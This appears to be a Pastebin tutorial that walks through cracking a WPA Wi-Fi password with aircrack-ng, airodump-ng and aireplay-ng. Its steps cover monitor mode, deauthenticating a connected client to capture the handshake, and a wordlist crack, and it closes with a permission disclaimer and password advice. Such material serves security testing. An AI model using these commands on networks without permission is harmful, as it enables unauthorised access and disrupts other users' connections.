Guest User

Untitled

a guest
Dec 9th, 2018
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
  1. My basic steps are:
  2.  
  3.  
  4.  
  5. 1) airmon-ng start wlan0
  6. 2) iwconfig
  7. 3) airodump-ng mon0
  8. 4) Hit control + C on my Keyboard
  9. 5) airodump-ng -c 6 -w output --bssid 00:11:22:33:44:55 mon0 - open another terminal
  10. 6) aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 00:22:44:66:88:10 mon0
  11. 7) aircrack-ng -w /home/youruser/wordlist.txt -b 00:11:22:33:44:55 output*.cap
  12.  
  13. Descriptons:
  14.  
  15. 1) This Puts my card into Monitor mode...my particular driver creats another interface called mon0...so i have to use this from now on.
  16. 2) Just to check to see that wlan0 is on managed mode and mon0 is on Monitor mode.
  17. 3) Starts airodump to view networks...provides necessary info...channel #, mac addy, essid, etc.
  18. 4) This stops airodump so we can restart it with the info we need
  19. 5) Starts airodump for the network were interested in...the data column should increase for this to work.
  20. 6) this step isnt necessary if your on a fairly active network with people connecting frequently...because for wpa you need to capture someone logging into the network...so this command sends a de-authorization request to a client connected so it forces them to reconnect so you can sniff out the handshake. -0 1 is the nuber of de-auth requests...increse the 1 if you need more. -c is a client on the network which you can find from the bottom of the previous terminal for step 5.
  21. 7) Starts the aircrack using the wordlist you have...you must put the full path to the list unless you are in the same directory...you can find wordlists anywhere. This uses the wordlist on data youve collected in the "output" file.
  22.  
  23. NOTE: you have to have you card on the same channel as the acess point...so you have to make sure you card is not channel hopping...The channel listed in the terminal on step #5 for the AP is the channel your card must be on....you can check this by running iwconifg, where it says frequency...thats the channel your on... heres the Channel to freq conversion::
  24.  
  25. CH FREQ
  26. 01 2.412
  27. 02 2.417
  28. 03 2.422
  29. 04 2.427
  30. 05 2.432
  31. 06 2.437
  32. 07 2.442
  33. 08 2.447
  34. 09 2.452
  35. 10 2.457
  36. 11 2.462
  37.  
  38. This particular crack tried 49,422 different keys before it was succesful...it did this at a rate of 493.81 keys per second so therefore it took 99.72 seconds to actually crack this network, pretty quick considering it did 50,000 words in under 100 seconds.
  39.  
  40.  
  41. DISCLAIMER: Do Not do this on someone elses network that you do not have permission from...this is purely for security testing your network to see how vulnerable it is to certian attacks.
  42.  
  43. If you use a strong WPA password you network should be pretty secure...wpa is only crackable by using wordlists so if you use a tough password that isnt on any wordlists your network is secure...Never use WEP because its even easier to crack then an easy WPA network.
Add Comment
Please, Sign In to add comment